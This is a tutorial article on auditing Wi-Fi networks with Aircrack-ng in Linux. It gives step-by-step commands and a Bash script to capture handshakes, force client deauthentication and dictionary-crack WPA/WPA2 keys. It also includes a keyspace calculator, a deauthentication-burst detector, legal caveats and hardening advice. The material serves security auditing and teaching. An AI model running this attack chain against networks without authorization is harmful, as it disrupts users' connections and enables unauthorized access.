Aircrack-ng: Complete guide for the audit of Wi-Fi networks in Linux

Introduction

Today, the security of wireless networks is a critical concern for both home users and IT professionals. The proliferation of IoT devices, teleworking and increasing reliance on connectivity have enlarged the attack surface of Wi-Fi networks. In this context, Aircrack-ng has established itself as one of the most powerful and versatile tools for conducting security audits in Linux environments. This article provides a comprehensive guide, from basic concepts to advanced techniques, so that you can evaluate and strengthen the protection of your own networks in a responsible way.

What is Aircrack-ng?

Aircrack-ng is a set of command-line utilities designed to detect, capture, analyse and try to break the keys of Wi-Fi networks protected with the WEP, WPA and WPA2 protocols and, on an experimental basis, WPA3. The package includes specialized tools such as airmon-ng (to place the interface in monitor mode), airodump-ng (packet capture), aireplay-ng (to inject traffic and cause deauthentication) and aircrack-ng (the cracking engine). Thanks to its modular architecture, each phase of the audit process can be run independently or chained by scripts, making it suitable for both manual testing and automated environments.

Main characteristics

  • Wide support for various types of encryption: WEP, WPA, WPA2 and WPA3 (experimental).
  • Available in the official repositories of most Linux distributions (Ubuntu, Debian, Fedora, Arch, openSUSE, etc.).
  • Lightweight command-line interface, suitable for servers, embedded systems and systems without a graphical environment.
  • Large active community, extensive documentation and numerous tutorials, scripts and help forums.
  • Compatibility with a wide range of Wi-Fi adapters that support monitor mode and packet injection (Atheros, Realtek, certain Intel and Ralink chips).
  • Possibility to integrate with other tools such as hashcat, crunch or pyrit for more effective attacks using GPUs or rainbow tables.

Installation in popular Linux distributions

Before installing, check that your adapter supports monitor mode and packet injection. You can check the compatibility list in the official Aircrack-ng wiki or run airmon-ng to see if the interface appears.

Ubuntu / Debian

  • Update the package index: sudo apt update
  • Install the main package: sudo apt install aircrack-ng
  • Optional, but recommended for compiling from source or using specific drivers: sudo apt install linux-headers-$(uname -r) build-essential libssl-dev

Fedora

  • Install from the official repository: sudo dnf install aircrack-ng
  • For development and compilation tools: sudo dnf install kernel-devel gcc make

Arch Linux

  • Use the community repository: sudo pacman -S aircrack-ng
  • If you prefer to compile the latest version: git clone https://github.com/aircrack-ng/aircrack-ng.git, then cd aircrack-ng && make && sudo make install.

Preparation of the interface

The first step is to place the Wi-Fi card in monitor mode. Suppose your interface is called wlan0:

  • Stop any service that may interfere with the capture: sudo airmon-ng check kill
  • Activate monitor mode: sudo airmon-ng start wlan0
  • This will create a new interface, generally wlan0mon, ready to capture traffic.
  • Verify the status with iwconfig. You should see «Mode: Monitor» for the created interface.

Packet capture with airodump-ng

To identify nearby networks and get the necessary handshakes, run:

  • sudo airodump-ng wlan0mon

This command shows, in real time, a table with BSSID, ESSID, channel, signal power and associated clients. Note the BSSID and channel of the target network, for example AA:BB:CC:DD:EE:FF on channel 6.

Then, focus the capture on that network and save the data in a file:

  • sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

The parameter -w defines the prefix of the output files (captura-01.cap, captura-01.csv, etc.). While the capture is active, you need to trigger a handshake.

Handshake (WPA / WPA2)

To force the reauthentication of a client and capture the four-way handshake, use aireplay-ng:

  • sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

The argument -0 2 sends two deauthentication packets; -a specifies the BSSID of the access point and -c the MAC address of the target client. When the client reconnects, the handshake will be recorded in the capture file.

If you don't know a client's MAC, you can omit the -c option; aireplay-ng will send deauthentication to all associated clients, increasing the probability of capturing a handshake.

Cracking the key with aircrack-ng

With the capture file containing the handshake, you can try to break the key using a dictionary:

  • sudo aircrack-ng -w /ruta/al/diccionario.txt captura-01.cap

Aircrack-ng will test every password in the dictionary against the handshake. If the key is present, it will show something like:

  • KEY FOUND! [ miClaveSecreta ]

For pure brute-force attacks (not recommended because of the time required), you can combine Aircrack-ng with tools like crunch or hashcat. For example, generate a dictionary of length 8-10 with crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt and then pass it to Aircrack-ng.

In addition, you can specify the type of attack explicitly:

  • -a 1 for WEP.
  • -a 2 for WPA / WPA2.
  • -b to filter by BSSID when the capture contains several networks.
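To put numbers on the "time required" remark above and on the 20-character passphrase recommended later in this guide, the following added example (not part of the original article) derives a WPA/WPA2 pairwise master key with the standard PBKDF2-HMAC-SHA1 construction and compares search spaces. The guess rate of one million per second and the function names are assumptions chosen for illustration.

```python
import hashlib
import math
import time

PBKDF2_ROUNDS = 4096                 # fixed by the WPA/WPA2-PSK key derivation
SECONDS_PER_YEAR = 365 * 24 * 3600

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, 32)

def keyspace(alphabet_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates of length min_len..max_len over the alphabet."""
    return sum(alphabet_size ** n for n in range(min_len, max_len + 1))

def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random passphrase of the given length."""
    return length * math.log2(alphabet_size)

def years_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a constant guess rate."""
    return candidates / guesses_per_second / SECONDS_PER_YEAR

def measured_rate(rounds: int = 20) -> float:
    """PMK derivations per second on this machine, single-threaded."""
    start = time.perf_counter()
    for i in range(rounds):
        wpa2_pmk(f"candidate{i:04d}", "lab-ssid")   # constructed inputs
    return rounds / (time.perf_counter() - start)

if __name__ == "__main__":
    assumed_rate = 1e6               # assumption: guesses per second
    small = keyspace(36, 8, 10)      # the crunch 8 10 a-z0-9 wordlist above
    large = 62 ** 20                 # 20 random characters from a-zA-Z0-9
    print(f"local rate: {measured_rate():.0f} PMK/s")
    print(f"8-10 chars, a-z0-9: {small:.3e} candidates, "
          f"{years_to_exhaust(small, assumed_rate):.0f} years")
    print(f"20 random chars:    {entropy_bits(62, 20):.0f} bits, "
          f"{years_to_exhaust(large, assumed_rate):.3e} years")
```

Because the SSID is the salt, the same passphrase yields a different key on every network name, which is why a unique SSID also weakens precomputed tables.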

Automation with scripts

For repetitive testing or multiple network audits, it is useful to create scripts that chain the phases. A basic example in Bash:

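    #!/bin/bash
    # Values taken from the examples above; adjust them to your own network
    INTERFAZ="wlan0mon"
    BSSID="AA:BB:CC:DD:EE:FF"
    CANAL=6
    OUTPUT="captura"

    # Activate monitor mode
    sudo airmon-ng start wlan0

    # Start the capture in the background
    sudo airodump-ng -c "$CANAL" --bssid "$BSSID" -w "$OUTPUT" "$INTERFAZ" &
    CAPTURE_PID=$!

    # Wait a bit for the capture to start
    sleep 5

    # Deauthenticate clients
    sudo aireplay-ng -0 5 -a "$BSSID" "$INTERFAZ"

    # Wait for clients to reconnect (interval length is an assumption), then stop the capture
    sleep 30
    sudo kill "$CAPTURE_PID"

    # Try to crack the key
    sudo aircrack-ng -w /ruta/al/diccionario.txt "${OUTPUT}-01.cap"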

This script activates the interface, starts the capture, sends deauthentication packets and, after an interval, tries to break the key. You can extend it with logging, mail notification, or integration with vulnerability management tools.

Troubleshooting common problems

  • The interface does not go into monitor mode: Verify that the driver supports this functionality and that there are no conflicts with NetworkManager or wpa_supplicant. Use sudo airmon-ng check kill to stop them.
  • No networks appear in airodump-ng: Make sure the card is really in monitor mode (iwconfig) and that you are within range; some cards have limited sensitivity.
  • Handshake is not captured: It may be due to the absence of active clients or an AP that ignores deauthentication. Try moving closer to the router, use a higher-gain antenna or wait for a device to connect naturally.
  • Aircrack-ng does not find the key despite having the handshake: Check that the dictionary contains the exact password; test with transformation rules (--rules in hashcat) or combine multiple lists.
  • Permission errors: Most operations require root privileges; run commands with sudo or switch to a root session.

Ethical and legal considerations

It is essential to remember that using Aircrack-ng in networks without explicit authorization is illegal and violates computer security laws in most countries. This guide is intended exclusively for:

  • Security audits on your own networks or on those where you have written permission from the owner.
  • Controlled laboratory environments for learning and certification (e.g. OSCP, CEH, GWAPT).
  • Improving awareness of the vulnerabilities of Wi-Fi configurations and applying appropriate countermeasures.

Always work within the legal framework and respect the privacy of others.

Best practices to protect your Wi-Fi network

After testing, implement the following recommendations to strengthen security:

  • Use WPA3 encryption when available; if not, WPA2-AES with a long and random password (minimum 20 characters).
  • Disable WPS, as it can be exploited to get the PIN and derive the key.
  • Update the router firmware regularly to correct known vulnerabilities.
  • Segment the guest network and limit access to critical resources through separate VLANs or SSIDs.
  • Monitor traffic with tools like Wireshark or tcpdump to detect abnormal behavior.
  • Apply MAC address filtering as an additional layer, even if it is not infallible, and regularly review the list of connected devices.
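As a concrete form of the traffic-monitoring recommendation, the following added example (not part of the original article) flags bursts of deauthentication frames, the pattern produced by the forced-reauthentication step described earlier. The line layout is an assumption about the text output of tcpdump -e for 802.11 management frames, the sample lines are constructed, and the threshold and window are assumed starting values to tune for your environment.

```python
import re
from collections import defaultdict, deque

# Assumed shape of `tcpdump -e -r capture.pcap` lines for 802.11 management frames.
DEAUTH = re.compile(
    r"^(\d\d):(\d\d):(\d\d\.\d+) .*?BSSID:(\S+) DA:(\S+) SA:\S+ DeAuthentication")
BROADCAST = "ff:ff:ff:ff:ff:ff"

def sample_lines():
    """Constructed capture text: one deauth burst, one isolated deauth, one beacon."""
    reason = "Class 3 frame received from nonassociated station"
    def deauth(sec, bssid, da):
        return (f"12:00:{sec:09.6f} BSSID:{bssid} DA:{da} SA:{bssid} "
                f"DeAuthentication ({bssid}): {reason}")
    ap, other = "aa:bb:cc:dd:ee:ff", "10:20:30:40:50:60"
    lines = [deauth(1.0 + i * 0.05, ap, BROADCAST if i % 2 else "11:22:33:44:55:66")
             for i in range(10)]
    lines.append(deauth(30.0, other, "66:55:44:33:22:11"))
    lines.append(f"12:00:31.000000 BSSID:{ap} DA:{BROADCAST} SA:{ap} Beacon (lab) ESS CH: 6")
    return lines

def find_deauth_bursts(lines, threshold=5, window=2.0):
    """Return alerts for BSSIDs with >= threshold deauths inside `window` seconds."""
    recent = defaultdict(deque)      # bssid -> (timestamp, destination) in the window
    alerts = {}
    for line in lines:
        m = DEAUTH.match(line)
        if not m:
            continue                 # beacons, data frames, anything unparsed
        hh, mm, ss, bssid, da = m.groups()
        ts = int(hh) * 3600 + int(mm) * 60 + float(ss)
        bssid, da = bssid.lower(), da.lower()
        q = recent[bssid]
        q.append((ts, da))
        while ts - q[0][0] > window:
            q.popleft()              # drop frames older than the window
        if len(q) >= threshold:
            a = alerts.setdefault(bssid, {"peak": 0, "targets": set(), "broadcast": False})
            a["peak"] = max(a["peak"], len(q))
            a["targets"].update(d for _, d in q)
            a["broadcast"] = BROADCAST in a["targets"]
    return alerts

if __name__ == "__main__":
    for bssid, a in find_deauth_bursts(sample_lines()).items():
        print(bssid, a["peak"], sorted(a["targets"]), a["broadcast"])
```

A single deauthentication frame is normal when a client leaves a network; a burst, especially one addressed to the broadcast address, is the signal worth alerting on.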

Conclusion

Aircrack-ng is an essential tool for any security professional who works in Linux environments and needs to assess the resistance of their wireless networks. Its combination of utilities for monitoring, capture, injection and cracking offers a complete and flexible workflow. However, its power carries a great responsibility: use it only with permission and within the limits of the law. With the knowledge acquired in this post, you will be better prepared to identify weaknesses, apply patches and keep your Wi-Fi connections safe against external threats.

This work is under a Creative Commons License Attribution 4.0 International for Francesc Roig, francesc@vivaldi.net.
